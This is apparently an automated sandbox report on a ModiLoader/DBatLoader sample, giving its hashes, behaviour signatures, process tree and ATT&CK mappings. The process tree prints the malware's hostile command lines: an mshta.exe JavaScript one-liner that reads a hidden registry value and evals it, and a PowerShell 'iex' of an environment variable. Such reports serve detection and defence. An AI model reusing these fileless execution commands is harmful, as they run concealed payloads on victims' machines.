Analysis

  • max time kernel
    143s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-06-2024 10:12

General

  • Target

    a0475b19ba5a17fd8e96105893224ebe_JaffaCakes118.exe

  • Size

    286KB

  • MD5

    a0475b19ba5a17fd8e96105893224ebe

  • SHA1

    9459d28f52a031d2ecbc835bbc6749b6f73fed0a

  • SHA256

    eae239033282bd915f0056e18127a5cc754170d1641d238cd8639d3a5bc863f9

  • SHA512

    f09a709a8cef0293e1c8861bd98650599b3c82ba3d037b8b34526224efb5da53ba1c863146db19f6d145ae25e455ccceb905cf10bb9a9bb8468bcb278beda1ec

  • SSDEEP

    3072:cfDwOmBOmvOmUKDHuGxSiQkaTkXu67PApDIPbVz1OdqUJnKSvuiVKSCFZlXRVAP9:jfxLp0k+YopDSVMNKSmT/sU1O

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a0475b19ba5a17fd8e96105893224ebe_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\a0475b19ba5a17fd8e96105893224ebe_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Users\Admin\AppData\Local\Temp\a0475b19ba5a17fd8e96105893224ebe_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\a0475b19ba5a17fd8e96105893224ebe_JaffaCakes118.exe"
      2⤵
        PID:2752
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:CW4eoy7YT="zy";V9Y2=new%20ActiveXObject("WScript.Shell");nNST6="cMl";wo6Sc=V9Y2.RegRead("HKCU\\software\\1d8KxJY8Vk\\w0m1Ct");V4sbd="f6mCCsCA";eval(wo6Sc);yx5fN8m="AEar";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1784
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:dpudon
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4812

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5k2m2w2.qt1.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2752-9-0x0000000000800000-0x00000000008DA000-memory.dmp
      Filesize

      872KB

    • memory/2752-11-0x0000000000800000-0x00000000008DA000-memory.dmp
      Filesize

      872KB

    • memory/2752-7-0x0000000000800000-0x00000000008DA000-memory.dmp
      Filesize

      872KB

    • memory/2752-10-0x0000000000800000-0x00000000008DA000-memory.dmp
      Filesize

      872KB

    • memory/2752-2-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/2752-8-0x0000000000800000-0x00000000008DA000-memory.dmp
      Filesize

      872KB

    • memory/2752-6-0x0000000000800000-0x00000000008DA000-memory.dmp
      Filesize

      872KB

    • memory/2752-12-0x0000000000800000-0x00000000008DA000-memory.dmp
      Filesize

      872KB

    • memory/2752-4-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/2752-5-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/4812-30-0x0000000005AE0000-0x0000000005B2C000-memory.dmp
      Filesize

      304KB

    • memory/4812-16-0x0000000004D00000-0x0000000004D22000-memory.dmp
      Filesize

      136KB

    • memory/4812-17-0x0000000005490000-0x00000000054F6000-memory.dmp
      Filesize

      408KB

    • memory/4812-18-0x0000000005570000-0x00000000055D6000-memory.dmp
      Filesize

      408KB

    • memory/4812-32-0x0000000005F80000-0x0000000005F9A000-memory.dmp
      Filesize

      104KB

    • memory/4812-28-0x0000000005650000-0x00000000059A4000-memory.dmp
      Filesize

      3.3MB

    • memory/4812-29-0x0000000005AA0000-0x0000000005ABE000-memory.dmp
      Filesize

      120KB

    • memory/4812-14-0x0000000004700000-0x0000000004736000-memory.dmp
      Filesize

      216KB

    • memory/4812-31-0x00000000072E0000-0x000000000795A000-memory.dmp
      Filesize

      6.5MB

    • memory/4812-15-0x0000000004D70000-0x0000000005398000-memory.dmp
      Filesize

      6.2MB